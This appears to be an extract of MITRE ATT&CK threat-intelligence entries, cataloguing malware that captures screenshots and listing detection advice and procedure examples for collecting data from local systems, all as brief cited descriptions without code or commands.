[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can capture screenshots and store them locally.(Citation: CISA EB Aug 2020)
Empire
[Empire](https://attack.mitre.org/software/S0363) is capable of capturing screenshots on Windows and macOS systems.(Citation: Github PowerShell Empire)
EvilGrab
[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture screenshots.(Citation: PWC Cloud Hopper Technical Annex April 2017)
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) takes a screenshot of the screen and displays it on top of all other windows for few seconds in an apparent attempt to hide some messages showed by the system during the setup process.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)
Flame
[Flame](https://attack.mitre.org/software/S0143) can take regular screenshots when certain applications are open that are sent to the command and control server.(Citation: Kaspersky Flame)
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) can capture screenshots.(Citation: Korean FSI TA505 2020)
FruitFly
[FruitFly](https://attack.mitre.org/software/S0277) takes screenshots of the user's desktop.(Citation: objsee mac malware 2017)
FunnyDream
The [FunnyDream](https://attack.mitre.org/software/S1044) ScreenCap component can take screenshots on a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)
GRIFFON
[GRIFFON](https://attack.mitre.org/software/S0417) has used a screenshot module that can be used to take a screenshot of the remote system.(Citation: SecureList Griffon May 2019)
HALFBAKED
[HALFBAKED](https://attack.mitre.org/software/S0151) can obtain screenshots from the victim.(Citation: FireEye FIN7 April 2017)
HotCroissant
[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to do real time screen viewing on an infected host.(Citation: Carbon Black HotCroissant April 2020)
Hydraq
[Hydraq](https://attack.mitre.org/software/S0203) includes a component based on the code of VNC that can stream a live feed of the desktop of an infected host.(Citation: Symantec Hydraq Jan 2010)
HyperBro
[HyperBro](https://attack.mitre.org/software/S0398) has the ability to take screenshots.(Citation: Unit42 Emissary Panda May 2019)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can capture screenshots of not only the entire screen, but of each separate window open, in case they are overlapping.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
JHUHUGIT
A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant takes screenshots by simulating the user pressing the "Take Screenshot" key (VK_SCREENSHOT), accessing the screenshot saved in the clipboard, and converting it to a JPG image.(Citation: Unit 42 Playbook Dec 2017)(Citation: Talos Seduploader Oct 2017)
Janicab
[Janicab](https://attack.mitre.org/software/S0163) captured screenshots and sent them out to a C2 server.(Citation: f-secure janicab)(Citation: Janicab)
KEYMARBLE
[KEYMARBLE](https://attack.mitre.org/software/S0271) can capture screenshots of the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) can take screenshots of the victim’s machine.(Citation: Talos Konni May 2017)
Kasidet
[Kasidet](https://attack.mitre.org/software/S0088) has the ability to initiate keylogging and screen captures.(Citation: Zscaler Kasidet)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) captures screenshots of the victim’s screen.(Citation: Unit 42 Kazuar May 2017)
KeyBoy
[KeyBoy](https://attack.mitre.org/software/S0387) has a command to perform screen grabbing.(Citation: PWC KeyBoys Feb 2017)
Kivars
[Kivars](https://attack.mitre.org/software/S0437) has the ability to capture screenshots on the infected host.(Citation: TrendMicro BlackTech June 2017)
LitePower
[LitePower](https://attack.mitre.org/software/S0680) can take system screenshots and save them to `%AppData%`.(Citation: Kaspersky WIRTE November 2021)
Lizar
[Lizar](https://attack.mitre.org/software/S0681) can take JPEG screenshots of an infected system.(Citation: Threatpost Lizar May 2021)(Citation: BiZone Lizar May 2021) 
LookBack
[LookBack](https://attack.mitre.org/software/S0582) can take desktop screenshots.(Citation: Proofpoint LookBack Malware Aug 2019)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) has used Apple’s Core Graphic APIs, such as `CGWindowListCreateImageFromArray`, to capture the user's screen and open windows.(Citation: ESET DazzleSpy Jan 2022)(Citation: Objective-See MacMa Nov 2021)
MacSpy
[MacSpy](https://attack.mitre.org/software/S0282) can capture screenshots of the desktop over multiple monitors.(Citation: objsee mac malware 2017)
Machete
[Machete](https://attack.mitre.org/software/S0409) captures screenshots.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can take a screenshot of the target machine and save it to a file.(Citation: SentinelLabs Metador Sept 2022)
MarkiRAT
[MarkiRAT](https://attack.mitre.org/software/S0652) can capture screenshots that are initially saved as ‘scr.jpg’.(Citation: Kaspersky Ferocious Kitten Jun 2021)
Matryoshka
[Matryoshka](https://attack.mitre.org/software/S0167) is capable of performing screen captures.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) can collect screenshots of the victim’s machine.(Citation: FireEye Metamorfo Apr 2018)(Citation: ESET Casbaneiro Oct 2019) 
Micropsia
[Micropsia](https://attack.mitre.org/software/S0339) takes screenshots every 90 seconds by calling the Gdi32.BitBlt API.(Citation: Radware Micropsia July 2018)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can capture the victim's screen.(Citation: McAfee Netwire Mar 2015)(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)
NightClub
[NightClub](https://attack.mitre.org/software/S1090) can load a module to call `CreateCompatibleDC` and `GdipSaveImageToStream` for screen capture.(Citation: MoustachedBouncer ESET August 2023)
ObliqueRAT
[ObliqueRAT](https://attack.mitre.org/software/S0644) can capture a screenshot of the current screen.(Citation: Talos Oblique RAT March 2021)
Octopus
[Octopus](https://attack.mitre.org/software/S0340) can capture screenshots of the victims’ machine.(Citation: Securelist Octopus Oct 2018)(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018)
POORAIM
[POORAIM](https://attack.mitre.org/software/S0216) can perform screen capturing.(Citation: FireEye APT37 Feb 2018)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve screenshots from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)
POWRUNER
[POWRUNER](https://attack.mitre.org/software/S0184) can capture a screenshot from a victim.(Citation: FireEye APT34 Dec 2017)
PcShare
[PcShare](https://attack.mitre.org/software/S1050) can take screen shots of a compromised machine.(Citation: Bitdefender FunnyDream Campaign November 2020)
Peppy
[Peppy](https://attack.mitre.org/software/S0643) can take screenshots on targeted systems.(Citation: Proofpoint Operation Transparent Tribe March 2016)
PlugX
[PlugX](https://attack.mitre.org/software/S0013) allows the operator to capture screenshots.(Citation: CIRCL PlugX March 2013)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to take screen captures.(Citation: Talos PoetRAT April 2020)(Citation: Dragos Threat Report 2020)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-TimedScreenshot&lt;/code&gt; Exfiltration module can take screenshots at regular intervals.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
Prikormka
[Prikormka](https://attack.mitre.org/software/S0113) contains a module that captures screenshots of the victim's desktop.(Citation: ESET Operation Groundbait)
Proton
[Proton](https://attack.mitre.org/software/S0279) captures the content of the desktop with the screencapture binary.(Citation: objsee mac malware 2017)
Pteranodon
[Pteranodon](https://attack.mitre.org/software/S0147) can capture screenshots at a configurable interval.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: Unit 42 Gamaredon February 2022)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can drop a mouse-logger that will take small screenshots around at each click and then send back to the server.(Citation: GitHub Pupy)
QuietSieve
[QuietSieve](https://attack.mitre.org/software/S0686) has taken screenshots every five minutes and saved them to the user's local Application Data folder under `Temp\SymbolSourceSymbols\icons` or `Temp\ModeAuto\icons`.(Citation: Microsoft Actinium February 2022)
RCSession
[RCSession](https://attack.mitre.org/software/S0662) can capture screenshots from a compromised host.(Citation: Profero APT27 December 2020)
RDAT
[RDAT](https://attack.mitre.org/software/S0495) can take a screenshot on the infected system.(Citation: Unit42 RDAT July 2020)	
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) can capture screenshots of the infected system using the `gdi32` library.(Citation: Talos ROKRAT)(Citation: Talos ROKRAT 2)(Citation: Securelist ScarCruft May 2019)(Citation: NCCGroup RokRat Nov 2018)(Citation: Malwarebytes RokRAT VBA January 2021)
RTM
[RTM](https://attack.mitre.org/software/S0148) can capture screenshots.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)
RainyDay
[RainyDay](https://attack.mitre.org/software/S0629) has the ability to capture screenshots.(Citation: Bitdefender Naikon April 2021)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can take screenshots every 30 seconds as well as when an external removable storage device is connected.(Citation: Antiy CERT Ramsay April 2020)
RedLeaves
[RedLeaves](https://attack.mitre.org/software/S0153) can capture screenshots.(Citation: FireEye APT10 April 2017)(Citation: Accenture Hogfish April 2018)
Remcos
[Remcos](https://attack.mitre.org/software/S0332) takes automated screenshots of the infected machine.(Citation: Riskiq Remcos Jan 2018)
Remexi
[Remexi](https://attack.mitre.org/software/S0375) takes screenshots of windows of interest.(Citation: Securelist Remexi Jan 2019)
RemoteUtilities
[RemoteUtilities](https://attack.mitre.org/software/S0592) can take screenshots on a compromised host.(Citation: Trend Micro Muddy Water March 2021)
Revenge RAT
[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for screen capture.(Citation: Cylance Shaheen Nov 2018)
RogueRobin
[RogueRobin](https://attack.mitre.org/software/S0270) has a command named &lt;code&gt;$screenshot&lt;/code&gt; that may be responsible for taking screenshots of the victim machine.(Citation: Unit 42 DarkHydrus July 2018)
Rover
[Rover](https://attack.mitre.org/software/S0090) takes screenshots of the compromised system's desktop and saves them to &lt;code&gt;C:\system\screenshot.bmp&lt;/code&gt; for exfiltration every 60 minutes.(Citation: Palo Alto Rover)
SHUTTERSPEED
[SHUTTERSPEED](https://attack.mitre.org/software/S0217) can capture screenshots.(Citation: FireEye APT37 Feb 2018)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can take a screenshot of the current desktop.(Citation: GitHub SILENTTRINITY Modules July 2019)
SLOTHFULMEDIA
[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has taken a screenshot of a victim's desktop, named it "Filter3.jpg", and stored it in the local directory.(Citation: CISA MAR SLOTHFULMEDIA October 2020)
SMOKEDHAM
[SMOKEDHAM](https://attack.mitre.org/software/S0649) can capture screenshots of the victim’s desktop.(Citation: FireEye Shining A Light on DARKSIDE May 2021)(Citation: FireEye SMOKEDHAM June 2021)
SVCReady
[SVCReady](https://attack.mitre.org/software/S1064) can take a screenshot from an infected host.(Citation: HP SVCReady Jun 2022)
SharpStage
[SharpStage](https://attack.mitre.org/software/S0546) has the ability to capture the victim's screen.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)
Sliver
[Sliver](https://attack.mitre.org/software/S0633) can take screenshots of the victim’s active display.(Citation: GitHub Sliver Screen)
Socksbot
[Socksbot](https://attack.mitre.org/software/S0273) can take screenshots.(Citation: TrendMicro Patchwork Dec 2017)
StoneDrill
[StoneDrill](https://attack.mitre.org/software/S0380) can take screenshots.(Citation: Kaspersky StoneDrill 2017)	
StrifeWater
[StrifeWater](https://attack.mitre.org/software/S1034) has the ability to take screen captures.(Citation: Cybereason StrifeWater Feb 2022)
SysUpdate
[SysUpdate](https://attack.mitre.org/software/S0663) has the ability to capture screenshots.(Citation: Trend Micro Iron Tiger April 2021)
T9000
[T9000](https://attack.mitre.org/software/S0098) can take screenshots of the desktop and target application windows, saving them to user directories as one byte XOR encrypted .dat files.(Citation: Palo Alto T9000 Feb 2016)
TURNEDUP
[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of taking screenshots.(Citation: FireEye APT33 Sept 2017)
TajMahal
[TajMahal](https://attack.mitre.org/software/S0467) has the ability to take screenshots on an infected host including capturing content from windows of instant messaging applications.(Citation: Kaspersky TajMahal April 2019)
TinyZBot
[TinyZBot](https://attack.mitre.org/software/S0004) contains screen capture functionality.(Citation: Cylance Cleaver)
Trojan.Karagany
[Trojan.Karagany](https://attack.mitre.org/software/S0094) can take a desktop screenshot and save the file into &lt;code&gt;\ProgramData\Mail\MailAg\shot.png&lt;/code&gt;.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)
Turian
[Turian](https://attack.mitre.org/software/S0647) has the ability to take screenshots.(Citation: ESET BackdoorDiplomacy Jun 2021)
UPPERCUT
[UPPERCUT](https://attack.mitre.org/software/S0275) can capture desktop screenshots in the PNG format and send them to the C2 server.(Citation: FireEye APT10 Sept 2018)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) has used hooked APIs to take screenshots.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro BKDR_URSNIF.SM)
VERMIN
[VERMIN](https://attack.mitre.org/software/S0257) can perform screen captures of the victim’s machine.(Citation: Unit 42 VERMIN Jan 2018)
Valak
[Valak](https://attack.mitre.org/software/S0476) has the ability to take screenshots on a compromised host.(Citation: Cybereason Valak May 2020)	 
Woody RAT
[Woody RAT](https://attack.mitre.org/software/S1065) has the ability to take a screenshot of the infected host desktop using Windows GDI+.(Citation: MalwareBytes WoodyRAT Aug 2022) 
XAgentOSX
[XAgentOSX](https://attack.mitre.org/software/S0161) contains the takeScreenShot (along with startTakeScreenShot and stopTakeScreenShot) functions to take screenshots using the CGGetActiveDisplayList, CGDisplayCreateImage, and NSImage:initWithCGImage methods.(Citation: XAgentOSX 2017)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) saves a screen capture of the victim's system with a numbered filename and &lt;code&gt;.jpg&lt;/code&gt; extension. Screen captures are taken at specified intervals based on the system. (Citation: trendmicro xcsset xcode project 2020)
ZLib
[ZLib](https://attack.mitre.org/software/S0086) has the ability to obtain screenshots of the compromised system.(Citation: Cylance Dust Storm)
Zebrocy
A variant of [Zebrocy](https://attack.mitre.org/software/S0251) captures screenshots of the victim’s machine in JPEG and BMP format.(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: CISA Zebrocy Oct 2020)
Zeus Panda
[Zeus Panda](https://attack.mitre.org/software/S0330) can take screenshots of the victim’s machine.(Citation: GDATA Zeus Panda June 2017)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) can capture screenshots.(Citation: FireEye APT41 Aug 2019)
gh0st RAT
[gh0st RAT](https://attack.mitre.org/software/S0032) can capture the victim’s screen remotely.(Citation: Nccgroup Gh0st April 2018)
jRAT
[jRAT](https://attack.mitre.org/software/S0283) has the capability to take screenshots of the victim’s machine.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)
metaMain
[metaMain](https://attack.mitre.org/software/S1059) can take and save screenshots.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
njRAT
[njRAT](https://attack.mitre.org/software/S0385) can capture screenshots of the victim’s machines.(Citation: Trend Micro njRAT 2018)
yty
[yty](https://attack.mitre.org/software/S0248) collects screenshots of the victim machine.(Citation: ASERT Donot March 2018)
</t>
  </si>
  <si>
    <t>Command Execution
Monitor executed commands and arguments that may search and collect local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.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[PowerShell](https://attack.mitre.org/techniques/T1059/001).
For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.
File Access
Monitor for unexpected/abnormal access to files that may be malicious collection of local data, such as user files (pdf, .docx, .jpg, etc.) or local databases.
OS API Execution
Monitor for API calls that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. 
Process Creation
Monitor for newly executed processes that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Script Execution
Monitor for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Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Data Loss Prevention
Data loss prevention can restrict access to sensitive data and detect sensitive data that is unencrypted.
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors obtained files and data from the compromised network.(Citation: DFIR Conti Bazar Nov 2021)
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks.(Citation: Mandiant APT41) 
C0026
During [C0026](https://attack.mitre.org/campaigns/C0026), the threat actors collected documents from compromised hosts.(Citation: Mandiant Suspected Turla Campaign February 2023)
CostaRicto
During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors collected data and files from compromised networks.(Citation: BlackBerry CostaRicto November 2020)
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used [Empire](https://attack.mitre.org/software/S0363) to gather various local system information.(Citation: Talos Frankenstein June 2019)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), the threat actors collected files and other data from compromised systems.(Citation: McAfee Night Dragon)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors collected data, files, and other information from compromised networks.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used malicious Trojans and DLL files to exfiltrate data from an infected host.(Citation: ClearSky Lazarus Aug 2020)(Citation: McAfee Lazarus Jul 2020)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors collected data from compromised hosts.(Citation: McAfee Honeybee)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors exfiltrated files and directories of interest from the targeted system.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) extracted files from compromised networks.(Citation: Volexity SolarWinds)
APT1
[APT1](https://attack.mitre.org/groups/G0006) has collected files from a local victim.(Citation: Mandiant APT1)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has retrieved internal documents from machines inside victim environments, including by using [Forfiles](https://attack.mitre.org/software/S0193) to stage documents before exfiltration.(Citation: Überwachung APT28 Forfiles June 2015)(Citation: DOJ GRU Indictment Jul 2018)(Citation: TrendMicro Pawn Storm 2019)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has stolen data from compromised hosts.(Citation: Mandiant APT29 Eye Spy Email Nov 22)
APT3
[APT3](https://attack.mitre.org/groups/G0022) will identify Microsoft Office documents on the victim's computer.(Citation: aptsim)
APT37
[APT37](https://attack.mitre.org/groups/G0067) has collected data from victims' local systems.(Citation: FireEye APT37 Feb 2018)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has collected data from a compromised host.(Citation: CISA AA20-239A BeagleBoyz August 2020)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used various tools to steal files from the compromised host.(Citation: Symantec Chafer February 2018)(Citation: FBI FLASH APT39 September 2020)
APT41
[APT41](https://attack.mitre.org/groups/G0096) has uploaded files and data from a compromised host.(Citation: Group IB APT 41 June 2021)
Andariel
[Andariel](https://attack.mitre.org/groups/G0138) has collected large numbers of files from compromised network systems for later extraction.(Citation: FSI Andariel Campaign Rifle July 2017)
Axiom
[Axiom](https://attack.mitre.org/groups/G0001) has collected data from a compromised network.(Citation: Novetta-Axiom)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has exfiltrated files stolen from local systems.(Citation: Secureworks BRONZE BUTLER Oct 2017)
CURIUM
[CURIUM](https://attack.mitre.org/groups/G1012) has exfiltrated data from a compromised machine.(Citation: Microsoft Iranian Threat Actor Trends November 2021)
Dark Caracal
[Dark Caracal](https://attack.mitre.org/groups/G0070) collected complete contents of the 'Pictures' folder from compromised Windows systems.(Citation: Lookout Dark Caracal Jan 2018)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has collected data from local victim systems.(Citation: US-CERT TA18-074A)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has gathered stolen credentials, sensitive data such as point-of-sale (POS), and ATM data from a compromised network before exfiltration.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has collected and exfiltrated payment card data from compromised systems.(Citation: Trend Micro FIN6 October 2019)(Citation: RiskIQ British Airways September 2018)(Citation: RiskIQ Newegg September 2018)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has collected files and other sensitive information from a compromised network.(Citation: CrowdStrike Carbon Spider August 2021)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has searched local system resources to access sensitive documents.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) collected data from the victim's local system, including password hashes from the SAM hive in the Registry.(Citation: Cybereason Soft Cell June 2019)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has collected files from infected systems and uploaded them to a C2 server.(Citation: ESET Gamaredon June 2020)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has collected data and files from a compromised machine.(Citation: Rapid7 HAFNIUM Mar 2021)
Inception
[Inception](https://attack.mitre.org/groups/G0100) used a file hunting plugin to collect .txt, .pdf, .xls or .doc files from the infected host.(Citation: Kaspersky Cloud Atlas August 2019)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) gathered information and files from local directories for exfiltration.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: Microsoft NICKEL December 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has collected Office, PDF, and HWP documents from its victims.(Citation: Securelist Kimsuky Sept 2013)(Citation: Talos Kimsuky Nov 2021)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) uploaded sensitive files, information, and credentials from a targeted organization for extortion or public release.(Citation: MSTIC DEV-0537 Mar 2022)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has collected data and files from compromised networks.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs)(Citation: Kaspersky ThreatNeedle Feb 2021)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has collected files and data from compromised machines.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used a web shell to exfiltrate a ZIP file containing a dump of LSASS memory on a compromised machine.(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) collected and exfiltrated files from the infected system.(Citation: Cymmetria Patchwork)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has exfiltrated internal documents, files, and other data from compromised hosts.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
Stealth Falcon
[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers data from the local victim system.(Citation: Citizen Lab Stealth Falcon May 2016)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) ran a command to compile an archive of file types of interest from the victim user's directories.(Citation: SecureWorks BRONZE UNION June 2017)
Turla
[Turla](https://attack.mitre.org/groups/G0010) RPC backdoors can upload files from victim machines.(Citation: ESET Turla PowerShell May 2019)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has stolen the Active Directory database from targeted environments and used [Wevtutil](https://attack.mitre.org/software/S0645) to extract event log information.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)
Windigo
[Windigo](https://attack.mitre.org/groups/G0124) has used a script to gather credentials in files left on disk by OpenSSH backdoors.(Citation: ESET ForSSHe December 2018)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has collected data from a compromised host prior to exfiltration.(Citation: Mandiant FIN12 Oct 2021)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has collected various files from the compromised computers.(Citation: DOJ APT10 Dec 2018)(Citation: Symantec Cicada November 2020)
Action RAT
[Action RAT](https://attack.mitre.org/software/S1028) can collect local data from an infected machine.(Citation: MalwareBytes SideCopy Dec 2021)
Amadey
[Amadey](https://attack.mitre.org/software/S1025) can collect information from a compromised host.(Citation: BlackBerry Amadey 2020)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) can collect data on a compromised host.(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)
AuTo Stealer
[AuTo Stealer](https://attack.mitre.org/software/S1029) can collect data such as PowerPoint files, Word documents, Excel files, PDF files, text files, database files, and image files from an infected machine.(Citation: MalwareBytes SideCopy Dec 2021)
BADFLICK
[BADFLICK](https://attack.mitre.org/software/S0642) has uploaded files from victims' machines.(Citation: Accenture MUDCARP March 2019)
BADNEWS
When it first starts, [BADNEWS](https://attack.mitre.org/software/S0128) crawls the victim's local drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)
BLINDINGCAN
 [BLINDINGCAN](https://attack.mitre.org/software/S0520) has uploaded files from victim machines.(Citation: US-CERT BLINDINGCAN Aug 2020)
BadPatch
[BadPatch](https://attack.mitre.org/software/S0337) collects files from the local system that have the following extensions, then prepares them for exfiltration: .xls, .xlsx, .pdf, .mdb, .rar, .zip, .doc, .docx.(Citation: Unit 42 BadPatch Oct 2017)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) can collect local files from the system .(Citation: CheckPoint Bandook Nov 2020) 
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) collects files from the local system.(Citation: McAfee Bankshot)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can retrieve information from the infected machine.(Citation: Cybereason Bazar July 2020)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has collected information from a compromised host.(Citation: Talos Bisonal Mar 2020) 
BlackMould
[BlackMould](https://attack.mitre.org/software/S0564) can copy files on a compromised host.(Citation: Microsoft GALLIUM December 2019)
BoxCaon
[BoxCaon](https://attack.mitre.org/software/S0651) can upload files from a compromised host.(Citation: Checkpoint IndigoZebra July 2021)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) has the ability to upload files from a compromised system.(Citation: Palo Alto Brute Ratel July 2022)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can capture and compress stolen credentials from the Registry and volume shadow copies.(Citation: Cybereason Bumblebee August 2022)
Calisto
[Calisto](https://attack.mitre.org/software/S0274) can collect data from user directories.(Citation: Securelist Calisto July 2018)
Caterpillar WebShell
[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to collect information from the local database.(Citation: ClearSky Lebanese Cedar Jan 2021) 
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) can collect data and files from a compromised host.(Citation: Check Point APT35 CharmPower January 2022)
China Chopper
[China Chopper](https://attack.mitre.org/software/S0020)'s server component can upload local files.(Citation: FireEye Periscope March 2018)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)(Citation: Rapid7 HAFNIUM Mar 2021)
Chrommme
[Chrommme](https://attack.mitre.org/software/S0667) can collect data from a local system.(Citation: ESET Gelsemium June 2021)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can collect information from a compromised host.(Citation: Trend Micro DRBControl February 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can collect data from a local system.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)
CookieMiner
[CookieMiner](https://attack.mitre.org/software/S0492) has retrieved iPhone text messages from iTunes phone backup files.(Citation: Unit42 CookieMiner Jan 2019)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) steals user files from local hard drives with file extensions that match a predefined list.(Citation: F-Secure Cosmicduke)
CreepyDrive
[CreepyDrive](https://attack.mitre.org/software/S1023) can upload files to C2 from victim machines.(Citation: Microsoft POLONIUM June 2022)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) can collect information from a compromised host.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)
Crutch
[Crutch](https://attack.mitre.org/software/S0538) can exfiltrate files from compromised systems.(Citation: ESET Crutch December 2020)
Cryptoistic
[Cryptoistic](https://attack.mitre.org/software/S0498) can retrieve files from the local file system.(Citation: SentinelOne Lazarus macOS July 2020)
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) can upload files from a compromised host.(Citation: NCSC Cyclops Blink February 2022)
DRATzarus
[DRATzarus](https://attack.mitre.org/software/S0694) can collect information from a compromised host.(Citation: ClearSky Lazarus Aug 2020)
DanBot
[DanBot](https://attack.mitre.org/software/S1014) can upload files from compromised hosts.(Citation: SecureWorks August 2019)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) can collect files from a compromised host.(Citation: Prevailion DarkWatchman 2021)
DnsSystem
[DnsSystem](https://attack.mitre.org/software/S1021) can upload files from infected machines after receiving a command with `uploaddd` in the string.(Citation: Zscaler Lyceum DnsSystem June 2022)
Drovorub
